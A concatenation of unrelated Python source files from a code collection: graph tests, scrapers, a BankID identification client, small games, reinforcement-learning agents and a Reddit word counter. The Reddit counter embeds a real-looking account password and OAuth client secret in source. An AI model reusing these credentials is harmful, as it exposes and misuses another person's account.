        self.assertListEqual(g.m_adjacency[2], [0, 0, 0, 0])
        self.assertListEqual(g.m_adjacency[3], [0, 0, 0, 0])
    def test_remove_edge(self):
        g = l.SimpleGraph(5)
        vertexes = [l.Vertex(i) for i in range(5)]
        for i in vertexes:
            g.AddVertex(i)
        g.m_adjacency = [
            [0, 1, 1, 1, 0],
            [1, 0, 0, 1, 1],
            [1, 0, 0, 1, 0],
            [1, 1, 1, 1, 1],
            [0, 1, 0, 1, 0],
        ]
        # Both directions of the undirected edge must be cleared.
        g.RemoveEdge(0, 1)
        self.assertListEqual(g.m_adjacency[0], [0, 0, 1, 1, 0])
        self.assertListEqual(g.m_adjacency[1], [0, 0, 0, 1, 1])
    def test_is_edge(self):
        g = l.SimpleGraph(5)
        vertexes = [i for i in range(5)]
        for i in vertexes:
            g.AddVertex(i)
        g.m_adjacency = [
            [0, 1, 1, 1, 0],
            [1, 0, 0, 1, 1],
            [1, 0, 0, 1, 0],
            [1, 1, 1, 1, 1],
            [0, 1, 0, 1, 0],
        ]
        self.assertTrue(g.IsEdge(0, 1))
        self.assertFalse(g.IsEdge(0, 4))
        self.assertTrue(g.IsEdge(3, 2))
        self.assertFalse(g.IsEdge(2, 1))
        # Out-of-range index should report "no edge", not crash.
        new_vert = 10
        self.assertFalse(g.IsEdge(2, new_vert))
    def test_dfs(self):
        g = l.SimpleGraph(5)
        g.AddVertex('A')
        g.AddVertex('B')
        g.AddVertex('C')
        g.AddVertex('D')
        g.AddVertex('E')
        g.m_adjacency = [
            [0, 1, 1, 1, 0],  # A
            [1, 0, 0, 1, 1],  # B
            [1, 0, 0, 1, 0],  # C
            [1, 1, 1, 1, 1],  # D
            [0, 1, 0, 1, 0],  # E
        ]
        # DFS returns the path as a list of Vertex objects.
        self.assertEqual([i.Value for i in g.DepthFirstSearch(0, 1)], ['A', 'B'])
        self.assertEqual([i.Value for i in g.DepthFirstSearch(3, 3)], ['D', 'D'])
        self.assertEqual([i.Value for i in g.DepthFirstSearch(2, 4)], ['C', 'A', 'B', 'E'])
        # self.assertEqual(g.DepthFirstSearch(2, 4), [])
    def test_bfs(self):
        g = l.SimpleGraph(5)
        g.AddVertex('A')
        g.AddVertex('B')
        g.AddVertex('C')
        g.AddVertex('D')
        g.AddVertex('E')
        g.m_adjacency = [
            [0, 1, 1, 1, 0],  # A
            [1, 0, 0, 1, 1],  # B
            [1, 0, 0, 1, 0],  # C
            [1, 1, 1, 1, 1],  # D
            [0, 1, 0, 1, 0],  # E
        ]
        # Add a sixth vertex reachable only through E to force depth 2.
        g.AddVertex('G')
        g.AddEdge(4, 5)
        self.assertEqual([i.Value for i in g.BreadthFirstSearch(3, 5)], ['D', 'E', 'G'])
        self.assertEqual([i.Value for i in g.BreadthFirstSearch(2, 4)], ['C', 'D', 'E'])
        self.assertEqual([i.Value for i in g.BreadthFirstSearch(4, 2)], ['E', 'D', 'C'])
        self.assertEqual([i.Value for i in g.BreadthFirstSearch(3, 3)], ['D'])
        self.assertEqual([i.Value for i in g.BreadthFirstSearch(1, 2)], ['B', 'A', 'C'])
    def test_WeakVertices(self):
        # NOTE(review): this test only prints — it asserts nothing, so it
        # can never fail.  Add an expected-value assertion.
        g = l.SimpleGraph(5)
        g.AddVertex('A')
        g.AddVertex('B')
        g.AddVertex('C')
        g.AddVertex('D')
        g.AddVertex('E')
        g.AddVertex('G')
        g.AddVertex('Z')
        g.AddVertex('R')
        g.AddVertex('K')
        g.m_adjacency = [
            # A  B  C  D  E  G  Z  R  K
            [0, 1, 1, 1, 0, 0, 0, 0, 0],  # A
            [1, 0, 1, 0, 1, 0, 0, 0, 0],  # B
            [1, 1, 0, 1, 0, 1, 0, 0, 0],  # C
            [1, 0, 1, 0, 0, 0, 0, 0, 0],  # D
            [0, 1, 0, 0, 0, 1, 0, 0, 0],  # E
            [0, 0, 1, 0, 1, 0, 1, 1, 0],  # G
            [0, 0, 0, 0, 0, 1, 0, 1, 0],  # Z
            [0, 1, 0, 1, 0, 1, 1, 0, 1],  # R
            [0, 0, 0, 0, 0, 0, 0, 1, 0],  # K
        ]
        print([i.Value for i in g.WeakVertices()])
if __name__ == '__main__':
    # Run the whole suite when this module is executed directly.
    unittest.main()
|
20,777 | 4773a164e5920438c24227467d82841d37440c5b | #!/usr/bin/python3
#
# Script Name: tracking_btc.py
# Location : /home/louis/Development/python/mymoney
# Description: This script scrapes
#
# Developer: Louis Lao
# Date:
#
# Modified By:
# Date:
# Reason:
import auth_mongodb
import moneyMod1
import datetime
import threading
# The following imports are required to trap Ctr-C to stop the script
# without printing a bunch of error messages.
import signal
import sys
import os
def signal_handler(signal, frame):
    """SIGINT handler: announce the interrupt and exit with status 0."""
    print('\tExiting script because you pressed Ctrl+C!')
    sys.exit(0)
# Register the Ctrl+C signal handler.
signal.signal (signal.SIGINT, signal_handler)
# NOTE(review): stderr is discarded for the rest of the run, which hides
# *all* tracebacks, not just the noise from interrupted timer threads.
dev_null = open (os.devnull, 'w')
sys.stderr = dev_null
print('Press Ctrl+C to stop script!')
# Get Bitcoin data from Google web site.
url = "https://finance.google.com/finance?q=currency:btc"
def scrape_btc () :
    """Print the latest BTC quote and re-schedule itself in 90 seconds.

    Each call arms a new (non-daemon) threading.Timer, so the script
    keeps polling forever until interrupted with Ctrl+C.
    """
    timer = threading.Timer (90.0, scrape_btc)
    timer.start()
    indexes_scraper = moneyMod1.Scraper (url, False)
    btcData = indexes_scraper.get_bitcoin ()
    # Fields come back as one '::'-separated string; indexes presumably
    # are 0=price, 1/2=change, 3/5/6=date parts — confirm in moneyMod1.
    data = btcData.split ("::")
    print ("Taken at:", datetime.datetime.now().time())
    print ("Bitcoin date:", data[3], data[5], data[6])
    print ("Bitcoin:", data[0], "(" + data[1] + "/" + data[2] + ")")
    print ("Bitcoin BASE:", str(round((float(data[0]) - float(data[1])), 4)))
    print('Press Ctrl+C to stop script!')
if __name__ == "__main__" :
scrape_btc()
|
20,778 | 08529bcac2e1f2d909fa43cfad76a1250a315381 | from distutils.core import setup, Extension
# Build configuration for the `omxplayer` CPython extension module.
# Macros, include paths and prebuilt objects mirror the omxplayer
# Makefile for the Raspberry Pi / VideoCore4 target.
_MACROS = [(name, '1') for name in (
    'TARGET_RASPBERRY_PI',
    '__VIDEOCORE4__',
    'GRAPHICS_X_VG',
    'HAVE_OMXLIB',
    'USE_EXTERNAL_FFMPEG',
    'USE_EXTERNAL_OMX',
    'HAVE_LIBAVCODEC_AVCODEC_H',
    'HAVE_LIBAVUTIL_MEM_H',
    'HAVE_LIBAVUTIL_OPT_H',
    'HAVE_LIBAVUTIL_AVUTIL_H',
    'HAVE_LIBAVFORMAT_AVFORMAT_H',
    'HAVE_LIBAVFILTER_AVFILTER_H',
    'OMX',
    'OMX_SKIP64BIT',
    'USE_EXTERNAL_LIBBCM_HOST',
    '__STDC_CONSTANT_MACROS',
    'STANDALONE',
    '__STDC_LIMIT_MACROS',
    '_LINUX',
    '_REENTRANT',
    '_LARGEFILE64_SOURCE',
)]

_OMXPLAYER = '/home/pi/omxplayer'
_FFMPEG_LIB = _OMXPLAYER + '/ffmpeg_compiled/usr/local/lib'

omxplayermodule = Extension(
    'omxplayer',
    define_macros=_MACROS,
    sources=['omxplayermodule.cpp'],
    include_dirs=[_OMXPLAYER + '/ffmpeg_compiled/usr/local/include',
                  _OMXPLAYER,
                  '/usr/local/include'],
    library_dirs=[_FFMPEG_LIB,
                  '/usr/local/lib',
                  '/opt/vc/lib'],
    # Pre-built object files and shared libraries linked straight in.
    extra_objects=[_OMXPLAYER + '/linux/RBP.o',
                   _OMXPLAYER + '/DynamicDll.o',
                   '/opt/vc/lib/libbcm_host.so',
                   _OMXPLAYER + '/utils/log.o',
                   _OMXPLAYER + '/OMXCore.o',
                   _OMXPLAYER + '/File.o',
                   _OMXPLAYER + '/OMXStreamInfo.o',
                   _OMXPLAYER + '/OMXPlayerAudio.o',
                   _OMXPLAYER + '/OMXThread.o',
                   _OMXPLAYER + '/OMXAudio.o',
                   _OMXPLAYER + '/OMXAudioCodecOMX.o',
                   '/opt/vc/lib/libopenmaxil.so',
                   _OMXPLAYER + '/OMXClock.o',
                   _OMXPLAYER + '/OMXReader.o',
                   _OMXPLAYER + '/utils/PCMRemap.o',
                   _OMXPLAYER + '/linux/XMemUtils.o',
                   _FFMPEG_LIB + '/libavcodec.so',
                   _FFMPEG_LIB + '/libavformat.so',
                   _FFMPEG_LIB + '/libavutil.so',
                   _FFMPEG_LIB + '/libavdevice.so',
                   _FFMPEG_LIB + '/libpostproc.so',
                   _FFMPEG_LIB + '/libswresample.so',
                   _FFMPEG_LIB + '/libswscale.so'])

setup(name='omxplayer', version='0.1', description='OMXPlayer',
      ext_modules=[omxplayermodule])
20,779 | 864bd0ffe1aef00d23834bfc0ab38daf7678a800 | def text():
print("")
print("")
#print("From part 61")
print("")
print("Before the pharaoh has a chance to speak, you blurt out your story and present him with the potion.")
print("")
print('"Thank you," says the pharaoh. "I do not know who you are, but I am in your debt. Now I have the power I need to defeat the evil Priests of Amun-Ra. How can I repay you?"')
print("")
print('You tell him that you only want to get back to your own time. He sends you to his magicians, and they help you. You only ask for one more thing before you return. You ask the pharaoh for some general information about his country. After all, you still have to hand in a term paper when you get back.')
print("")
print('The pharaoh smiles and gives you a personal tour of his city. Then he gives you a special present before you return home.')
print("")
print("You get a good grade on your term paper, but your parents will always wonder where you got the small gold statue of an eagle.")
print("")
print("")
print("+ The End")
print("")
print("")
return |
20,780 | 49c151713c93d9d0858ef0be6c32ec1ed089ba69 | from .visualize import annotation
from .visualize import draw
from .visualize import embedding
|
20,781 | 9cd870237236d7cb6a8698022df32623f1b5bf46 | import math
import time
def split(str):
    """Break a decimal string into base-100 chunks (two digits each).

    Note: the parameter shadows the builtin ``str`` (kept for interface
    compatibility).  Odd-length input raises IndexError, as before.
    """
    chunks = []
    for pos in range(0, len(str), 2):
        chunks.append(int(str[pos] + str[pos + 1]))
    return chunks
def bigmul(p,q):
    """Multiply two numbers given as base-100 chunk lists (most
    significant chunk first, as produced by ``split``).

    Prints the product and returns it as an int.
    """
    sum=0
    m=len(p)
    n=len(q)
    for i in range (m):
        for j in range(n):
            # Chunk p[i] has weight 100**(m-1-i), q[j] has 100**(n-1-j).
            # Bug fix: the original exponent (m-2*i + n-2*j) is only
            # correct when m + n == 4, so the 64-digit inputs below were
            # multiplied wrongly.
            sum+=(10**(2*(m-1-i)+2*(n-1-j)))*p[i]*q[j]
    print(sum)
    return sum
#string1="3456"
#string2="4545"
string1='3141592653589793238462643383279502884197169399375105820974944592'
string2='2718281828459045235360287471352662497757247093699959574966967627'
t0=time.time()
array1=split(string1)
array2=split(string2)
product=bigmul(array1,array2)
t1=time.time()
print'time consumes is',t1-t0
#print " ".join('%02d'%x for x in array1)
#print " ".join('%02d'%x for x in array2)
print 'the prduct is ',product
|
20,782 | a5308124cf5d5ed0b744ec1dee93b857b01fdd7b | import random
rock = '''
_______
---' ____)
(_____)
(_____)
(____)
---.__(___)
'''
paper = '''
_______
---' ____)____
______)
_______)
_______)
---.__________)
'''
scissors = '''
_______
---' ____)____
______)
__________)
(____)
---.__(___)
'''
# Play one round: 0 = rock, 1 = paper, 2 = scissors.
obj=[rock,paper,scissors]
print("welcome to rock, paper, scissors!")
choices=int(input("enter any choice 0,1,2:"))
print("you've choosen:")
you=obj[choices]
print(you)
style=random.randint(0,2)
print("computer's choice:")
computer=obj[style]
print(computer)
# Bug fix: the original compared the ASCII-art strings lexicographically
# ("you > computer"), which has nothing to do with the game rules.
# Rock(0) beats scissors(2), paper(1) beats rock(0), scissors(2) beats
# paper(1) — i.e. the player wins exactly when (choices - style) % 3 == 1.
if choices == style:
    print("its a tie!")
elif (choices - style) % 3 == 1:
    print("you win!")
else:
    print("you lose!")
20,783 | c9e3e6abc1234636c83ccbf95e99ffd7b9970a3d | import config
import webbrowser
import requests
import time
import json
def get_token():
    """ This function will send a request with HTTP Basic authentication to receive a token
    Returns:
        String -- Token
    """
    # Token url
    token_endpoint = "https://api.signicat.io/oauth/connect/token"
    # Client-credentials grant, limited to the 'identify' scope.
    payload = {'grant_type': 'client_credentials', 'scope': 'identify'}
    credentials = (config.CLIENT_ID, config.CLIENT_SECRET)
    response = requests.post(token_endpoint, data=payload,
                             allow_redirects=True, auth=credentials)
    # Parse the JSON body and hand back only the bearer token.
    return json.loads(response.text)['access_token']
def get_id():
    """ This function fetches the id of a session and directs the user to BankID authentication
    Returns:
        [String]: Session ID
    """
    token = get_token()
    # Endpoint url
    endpoint = "https://api.idfy.io/identification/v2/sessions"
    # Setting headers with the authorization bearer
    headers = {'Content-Type': 'application/json', 'Authorization': f'Bearer {token}'}
    # Session request: redirect flow, Norwegian BankID providers, the
    # identity attributes to include, and the post-auth redirect targets.
    data = {
        "languages": "en",
        "flow": "redirect",
        "allowedProviders": [
            "no_bankid_netcentric",
            "no_bankid_mobile"
        ],
        "include": [
            "name",
            "date_of_birth",
            "phone_number",
            "nin",
            "email"
        ],
        "redirectSettings": {
            "successUrl": "https://example.com/success",
            "abortUrl": "https://example.com/abort",
            "errorUrl": "https://example.com/error"
        }
    }
    # Converting the data into a json string and sending a post request
    response = requests.post(endpoint, data=json.dumps(data), headers=headers).json()
    # Opening the browser and to authenticate the user
    webbrowser.open(response['url'])
    # returning the session id
    return response['id']
def get_session(_id):
    """ This function retrieves the identification session by using the id we found by logging in with BankID
    """
    bearer = f'Bearer {get_token()}'
    headers = {'Content-Type': 'application/json', 'Authorization': bearer}
    endpoint = f"https://api.signicat.io/identification/v2/sessions/{_id}"
    session = requests.get(endpoint, headers=headers).json()
    # Echo the identity block for interactive runs, then hand it back.
    print(session['identity'])
    return session['identity']
20,784 | f68b817206aa80d8e033a2e35e5565cbcc2df6ff | """
-- Sent Collection v.1 para análise de agrupamento --
-- Grupo 1 --
--Marciele de Menezes Bittencourt --
--Rodrigo Vieira da Silva --
--Washington Rodrigo Dias da Silva --
-----------------------------------------------------
"""
import json
import os
def save(filename, data):
    """Serialize *data* as JSON into *filename*, creating parent dirs."""
    mkdir(filename)
    with open(filename, 'w') as handle:
        json.dump(data, handle)
def savecsv(filename, header, data):
    """Write a ';'-separated CSV: quoted *header* cells, then *data* rows.

    Every cell (including the last in a line) is followed by ';', matching
    the project's existing file format.
    """
    mkdir(filename)
    with open(filename, 'w', encoding='utf-8') as out:
        out.write(''.join('"{}";'.format(cell) for cell in header))
        out.write('\n')
        for row in data:
            out.write(''.join(str(cell) + ';' for cell in row))
            out.write('\n')
def saveclu(filename, Y):
    """Write cluster labels: one "index<TAB>label" line per element of *Y*."""
    mkdir(filename)
    with open(filename, 'w', encoding='utf-8') as out:
        for idx, label in enumerate(Y):
            out.write('{}\t{}\n'.format(idx, label))
def mkdir(filename):
    """Ensure the directory containing *filename* exists.

    Fixes two defects in the original: a TOCTOU race between the
    ``exists`` check and ``makedirs`` (now handled by ``exist_ok``), and
    a crash when *filename* has no directory component —
    ``os.path.dirname`` returns '' and ``os.makedirs('')`` raises.
    """
    directory = os.path.dirname(filename)
    if directory:
        os.makedirs(directory, exist_ok=True)
def intTryParse(value):
    """Attempt int conversion of *value*.

    Returns (int(value), True) on success, or (value, False) when the
    value cannot be parsed as an integer.
    """
    try:
        parsed = int(value)
    except ValueError:
        return value, False
    return parsed, True
def inputInt(msg, maxV=None):
    """Prompt repeatedly with *msg* until the user enters a valid int.

    When *maxV* is given, the value must also satisfy 0 <= value <= maxV.
    """
    while True:
        candidate, ok = intTryParse(input(msg))
        # Bounds are only checked after a successful parse (short-circuit).
        if ok and (maxV is None or 0 <= candidate <= maxV):
            return candidate
        print("Invalid Value!")
def printGreen(prt):
    """Print *prt* wrapped in ANSI bright-green escape codes."""
    print("\033[92m {}\033[00m".format(prt))
def printRed(prt):
    """Print *prt* wrapped in ANSI bright-red escape codes.

    Bug fix: the original reused the green SGR code (92); bright red is 91.
    """
    print("\033[91m {}\033[00m".format(prt))
20,785 | d515314d746d4b746e0eed823c0c95e29aaf92fd | import random
import numpy as np
from hyperparams import *
class Agent():
    """Base tabular ε-greedy agent over a grid environment.

    ``Q`` is a (env.w, env.h, 4) action-value table — one entry per
    (x, y, action).  The exploration rate ``ε`` comes from the
    star-import of ``hyperparams``.
    """
    def __init__(self, env):
        # env must expose integer grid dimensions ``w`` and ``h``.
        self.env = env
        self.reset()
    def reset(self):
        # Zero-initialised Q-table; 4 = number of discrete actions.
        self.Q = np.zeros((self.env.w, self.env.h, 4))
    def get_action(self, s):
        # ε-greedy: random action with probability ε, else the greedy one.
        if random.random() < ε:
            return random.randint(0, 3)
        else:
            return np.argmax(self.Q[tuple(s)])
class QLearning(Agent):
    """Off-policy Q-learning: bootstraps on max over next-state actions."""
    def __init__(self, env):
        Agent.__init__(self, env)
    def update_Q(self, s, a, r, s2, a2):
        # ``a2`` is accepted for interface parity but unused (off-policy).
        key = tuple(s) + (a,)
        self.Q[key] += α * (r + (γ * np.max(self.Q[tuple(s2)])) - self.Q[key])
class reg_SARSA(Agent):
    """On-policy SARSA: bootstraps on the action actually taken next."""
    def __init__(self, env):
        Agent.__init__(self, env)
    def update_Q(self, s, a, r, s2, a2):
        key = tuple(s) + (a,)
        next_key = tuple(s2) + (a2,)
        self.Q[key] += α * (r + (γ * self.Q[next_key]) - self.Q[key])
class Expected_SARSA(Agent):
    """Expected SARSA: bootstraps on the ε-greedy expectation over a'."""
    def __init__(self, env):
        Agent.__init__(self, env)
    def expected_next_Q(self, s2):
        # Action probabilities under the ε-greedy policy: the greedy
        # action gets 1 - ε + ε/4, each of the others ε/4.
        greedy = np.argmax(self.Q[tuple(s2)])
        expectation = 0
        for candidate in range(4):
            weight = 1 - ε + (ε / 4) if candidate == greedy else ε / 4
            expectation += weight * self.Q[tuple(s2) + (candidate,)]
        return expectation
    def update_Q(self, s, a, r, s2, a2):
        # ``a2`` is unused: the expectation replaces the sampled action.
        key = tuple(s) + (a,)
        self.Q[key] += α * (r + (γ * self.expected_next_Q(s2)) - self.Q[key])
|
20,786 | 3ea9309c8929abd0ec3ac2f72e4d50e97efd6647 | #!/usr/bin/python3
"""BEHOLD MY ABOMINATION"""
import requests
def count_words(subreddit, word_list, *args):
    """Recursively count how often each word in ``word_list`` appears in
    the titles of ``subreddit``'s hot posts, then print the sorted tally
    ("no loops" constraint: all iteration is done via recursion).

    ``*args`` threads the recursion state between calls:
    args[0] auth response, args[1] listing response, args[2] tally dict,
    args[3] word index, args[4] title index, args[5] print index.
    """
    # print(args)
    base_url = "https://www.reddit.com"
    # NOTE(review): account and OAuth credentials are hard-coded in
    # source — move them to environment variables before publishing.
    data = {"grant_type": "password",
            "username": "jcook0017",
            "password": "temppassword"}
    auth = requests.auth.HTTPBasicAuth("LMsd7o4qaDp3cw",
                                       "KQLYhsl5_Oe1RzvKF-77sqpEYHgGvg")
    # Fetch the OAuth token only on the first call; later calls reuse it.
    try:
        r = args[0]
    except IndexError:
        # print("post")
        r = requests.post(base_url + "/api/v1/access_token",
                          data=data,
                          headers={"user-agent": "0x13 Count it by jcook0017"},
                          auth=auth)
    d = r.json()
    # print(d)
    token = "bearer" + d["access_token"]
    base_url = "https://oauth.reddit.com"
    headers = {"Authorization": token,
               "User-Agent": "0x13 Count it by jcook0017"}
    # Fetch the first page of /hot only on the first call.
    try:
        result = args[1]
    except IndexError:
        # print("get")
        result = requests.get(base_url + "/r/{}/hot.json".format(subreddit),
                              headers=headers)
    # init vars if not
    try:
        count_word_list = args[3]
    except IndexError:
        count_word_list = 0
    try:
        count_title = args[4]
    except IndexError:
        count_title = 0
    try:
        my_dict = args[2]
    except IndexError:
        my_dict = {}
    # print("my_dict = ", my_dict)
    # print(count_word_list)
    # print(count_title)
    # print(word_list[count_word_list])
    # Phase 1: scan the current page title-by-title, word-by-word.
    # (my_dict becomes a list in phase 3, which ends this phase.)
    if ((count_title < 25 and not isinstance(my_dict, list) and
            result.status_code == 200)):
        my_stirng = (result
                     .json()["data"]["children"][count_title]["data"]["title"]
                     .lower())
        # print("my_stirng = ", my_stirng)
        my_stirng = my_stirng.lower()
        # print(result.status_code)
        if result.status_code == 200 and count_word_list < len(word_list):
            key = word_list[count_word_list].lower()
            # print(type(key))
            # print(key)
            if my_stirng.find(str(key)) != -1:
                # print(key)
                # Tally substring occurrences of this word in the title.
                try:
                    my_dict[key] += my_stirng.count(key)
                except KeyError:
                    my_dict[key] = my_stirng.count(key)
                count_title += 1
                return count_words(subreddit,
                                   word_list,
                                   r,
                                   result,
                                   my_dict,
                                   count_word_list,
                                   count_title)
            else:
                count_word_list += 1
                return count_words(subreddit,
                                   word_list,
                                   r,
                                   result,
                                   my_dict,
                                   count_word_list,
                                   count_title)
        # print("full 'loop'")
        # All words checked for this title: reset word index, next title.
        count_word_list = 0
        count_title += 1
        return count_words(subreddit,
                           word_list,
                           r,
                           result,
                           my_dict,
                           count_word_list,
                           count_title)
    # Phase 2: page exhausted — follow the "after" cursor to the next page.
    elif count_title == 25 and result.status_code == 200:
        # print(count_title)
        count_title = 0
        count_word_list = 0
        # print("after")
        after = result.json()["data"]["after"]
        # print(after)
        result = requests.get(base_url + "/r/{}/hot.json&after={}"
                              .format(subreddit, after),
                              headers=headers)
        return count_words(subreddit,
                           word_list,
                           r,
                           result,
                           my_dict,
                           count_word_list,
                           count_title)
    # Phase 3: sort the tally (count desc, then word desc) and print one
    # line per recursive call until the list is exhausted.
    else:
        if not isinstance(my_dict, list):
            # print(my_dict)
            my_dict = sorted(my_dict.items(),
                             key=lambda x: (x[1], x[0]),
                             reverse=True)
        # print(my_dict)
        try:
            list_count = args[5]
        except IndexError:
            list_count = 0
        if list_count < len(my_dict):
            print(my_dict[list_count][0], ": ", my_dict[list_count][1])
            list_count += 1
            return count_words(subreddit,
                               word_list,
                               r,
                               result,
                               my_dict,
                               count_word_list,
                               count_title,
                               list_count)
|
20,787 | fe6ca0dbd52f16b64128ba1d7c9a04a3a4bf2006 | # start_date_report.py
import csv
import datetime
import requests
import operator # Added to sort the csv.reader output
FILE_URL="http://marga.com.ar/employees-with-date.csv"
def get_start_date():
    """Interactively get the start date to query for."""
    print()
    print('Getting the first start date to query for.')
    print()
    print('The date must be greater than Jan 1st, 2018')
    prompts = ('Enter a value for the year: ',
               'Enter a value for the month: ',
               'Enter a value for the day: ')
    year, month, day = (int(input(p)) for p in prompts)
    print()
    return datetime.datetime(year, month, day)
def get_file_lines(url):
    """Returns the lines contained in the file at the given URL"""
    # Stream the download and decode each raw line into a str.
    response = requests.get(url, stream=True)
    return [raw.decode("UTF-8") for raw in response.iter_lines()]
# Downloaded once at module import; get_same_or_newer() re-reads this list.
data = get_file_lines(FILE_URL)
def get_same_or_newer(start_date):
    """Returns the employees that started on the given date, or the closest one."""
    # data = get_file_lines(FILE_URL) ## Moved up & out of the function
    # Sort the rows by the ISO start-date column so equal dates group up.
    reader = sorted(csv.reader(data[1:]), key=operator.itemgetter(3))
    # We want all employees that started at the same date or the closest newer
    # date. To calculate that, we go through all the data and find the
    # employees that started on the smallest date that's equal or bigger than
    # the given start date.
    min_date = datetime.datetime.today()
    min_date_employees = []
    for row in reader:
        row_date = datetime.datetime.strptime(row[3], '%Y-%m-%d')
        # If this date is smaller than the one we're looking for,
        # we skip this row
        if row_date < start_date:
            continue
        # If this date is smaller than the current minimum,
        # we pick it as the new minimum, resetting the list of
        # employees at the minimal date.
        if row_date < min_date:
            min_date = row_date
            min_date_employees = []
        # Bug fix: the original never appended anyone, so the employee
        # list was always empty.  Collect every row at the minimal date.
        if row_date == min_date:
            # NOTE(review): assumes columns are (first name, surname, ...,
            # start date) — confirm against the CSV header.
            min_date_employees.append("{} {}".format(row[0], row[1]))
    return min_date, min_date_employees
def list_newer(start_date):
    """Print each start-date group from *start_date* through today."""
    while start_date < datetime.datetime.today():
        start_date, employees = get_same_or_newer(start_date)
        print("Started on {}: {}".format(start_date.strftime("%b %d, %Y"), employees))
        # Advance one day past the date just reported.
        start_date += datetime.timedelta(days=1)
def main():
    """Entry point: prompt for a start date and report hires from then on."""
    list_newer(get_start_date())
if __name__ == "__main__":
    main()
20,788 | 40b3abaf49955fa49e0f48cd65c69e951ec4f8ae | from piece import Piece
class Pawn(Piece):
    """Pawn chess piece.

    ``count`` tracks moves made; 0 means the initial two-square advance
    is still available.  Black ('B') pawns advance toward increasing row
    indices, all other colors toward decreasing ones.
    """
    def __init__(self, color):
        Piece.__init__(self, color)
        self.name = color + '_' + 'P'
        self.count = 0
    def getLegalMoves(self, board):
        """Return [non_capture_moves, capture_moves] for this pawn.

        Each entry is a list of destination tiles on *board*; the pair is
        also cached on ``self.LegalMovesList``.
        """
        position = self.getPosition()
        LegalMovesListNull = []
        LegalMovesListDestroyable = []
        DoubleAdvance = False
        for row in board:
            for tile in row:
                if tile.getPosition() == position:
                    if self.getCount() == 0:
                        DoubleAdvance = True
                    if self.getColor() == 'B':
                        # Black: single/double advance onto empty tiles.
                        if position[0] + 1 < 8 and board[position[0] + 1][position[1]].getName() == ' ':
                            LegalMovesListNull.append(board[position[0] + 1][position[1]])
                        if DoubleAdvance and position[0] + 2 < 8 and board[position[0] + 2][position[1]].getName() == ' ':
                            LegalMovesListNull.append(board[position[0] + 2][position[1]])
                        # Diagonal captures of opposing pieces.
                        if position[0] + 1 < 8 and position[1] + 1 < 8 and board[position[0] + 1][position[1] + 1].getName() != ' ' and board[position[0] + 1][position[1] + 1].getColor() != tile.getColor():
                            LegalMovesListDestroyable.append(board[position[0] + 1][position[1] + 1])
                        if position[0] + 1 < 8 and position[1] - 1 > -1 and board[position[0] + 1][position[1] - 1].getName() != ' ' and board[position[0] + 1][position[1] - 1].getColor() != tile.getColor():
                            LegalMovesListDestroyable.append(board[position[0] + 1][position[1] - 1])
                    else:
                        # White: advances toward decreasing row indices.
                        if position[0] - 1 > -1 and board[position[0] - 1][position[1]].getName() == ' ':
                            LegalMovesListNull.append(board[position[0] - 1][position[1]])
                        # Bug fix: the double-advance bound must be the
                        # lower bound (> -1); the original used "< 8",
                        # letting board[-1] wrap to the bottom row.
                        if DoubleAdvance and position[0] - 2 > -1 and board[position[0] - 2][position[1]].getName() == ' ':
                            LegalMovesListNull.append(board[position[0] - 2][position[1]])
                        if position[0] - 1 > -1 and position[1] + 1 < 8 and board[position[0] - 1][position[1] + 1].getName() != ' ' and board[position[0] - 1][position[1] + 1].getColor() != tile.getColor():
                            LegalMovesListDestroyable.append(board[position[0] - 1][position[1] + 1])
                        if position[0] - 1 > -1 and position[1] - 1 > -1 and board[position[0] - 1][position[1] - 1].getName() != ' ' and board[position[0] - 1][position[1] - 1].getColor() != tile.getColor():
                            LegalMovesListDestroyable.append(board[position[0] - 1][position[1] - 1])
        self.LegalMovesList = [LegalMovesListNull, LegalMovesListDestroyable]
        return self.LegalMovesList
|
20,789 | 7f49ba6fdd1bd76ca18111263efae712d7ad8312 | import numpy as np
from collections import defaultdict
import pickle
from time import time
from Game import Game
from Snake import Snake
class QLearningModel:
def __init__(self):
self.rewardAlive = -1
self.rewardKill = -10000
self.rewardScore = 50000000
# learningRate
self.alpha = 0.00001
# ZerfallsRate
self.alphaD = 0.999
# discount factor
self.gamma = 0.9
# randomness
self.e = 0.5
self.ed = 1.3
self.emin = 0.0001
try:
with open("Q-distance.pickle", "rb") as file:
self.Q = defaultdict(lambda: [0, 0, 0, 0], pickle.load(file))
except:
self.Q = defaultdict(lambda: [0, 0, 0, 0])
# UP LEFT DOWN RIGHT
print("NEW Q")
self.lastMoves = ""
self.oldState = None
self.oldAction = None
self.gameCounter = 0
self.gameScores = []
self.start = 0
self.end = 0
def generatePrediction(self, state):
estReward = self.Q[state]
prevReward = self.Q[self.oldState]
index = 0
if self.oldAction == 'U':
index = 0
if self.oldAction == 'L':
index = 1
if self.oldAction == 'D':
index = 2
if self.oldAction == 'R':
index = 3
reward = (-10) / 50
prevReward[index] = (1 - self.alpha) * prevReward[index] + \
self.alpha * (reward + self.gamma * max(estReward))
self.Q[self.oldState] = prevReward
self.oldState = state
basedOnQ = np.random.choice([True, False], p=[1 - self.e, self.e])
if basedOnQ == False:
choice = np.random.choice(['U', 'L', 'D', 'R'], p=[0.25, 0.25, 0.25, 0.25])
self.oldAction = choice
return choice
else:
if estReward[0] > estReward[1] and estReward[0] > estReward[2] and estReward[0] > estReward[3]:
self.oldAction = 'U'
return 0
if estReward[1] > estReward[0] and estReward[1] > estReward[2] and estReward[1] > estReward[3]:
self.oldAction = 'L'
return 3
if estReward[2] > estReward[0] and estReward[2] > estReward[1] and estReward[2] > estReward[3]:
self.oldAction = 'D'
return 2
if estReward[3] > estReward[0] and estReward[3] > estReward[1] and estReward[3] > estReward[2]:
self.oldAction = 'R'
return 1
else:
choice = np.random.choice(['U', 'L', 'D', 'R'], p=[0.25, 0.25, 0.25, 0.25])
self.oldAction = choice
return choice
def onGameOver(self, score):
self.gameScores.append(score)
# update Q of previous state (state which lead to gameOver)
prevReward = self.Q[self.oldState]
if self.oldAction is None:
index = 0
if self.oldAction == 'U':
index = 0
if self.oldAction == 'L':
index = 1
if self.oldAction == 'D':
index = 2
if self.oldAction == 'R':
index = 3
prevReward[index] = (1 - self.alpha) * prevReward[index] + self.alpha * self.rewardKill
self.Q[self.oldState] = prevReward
self.oldState = None
self.oldAction = None
# save Q as pickle
if self.gameCounter % 200 == 0:
with open("Q-distance.pickle", "wb") as file:
pickle.dump(dict(self.Q), file)
print("+++++++++ Pickle saved +++++++++")
# show some stats
if self.gameCounter % 100 == 1:
self.end = time()
timeD = self.end - self.start
print(str(self.gameCounter) + " : " + "\t" + 'meanScore: ' + str(
np.mean(self.gameScores[-100:])) + "| HighScore: " + str(
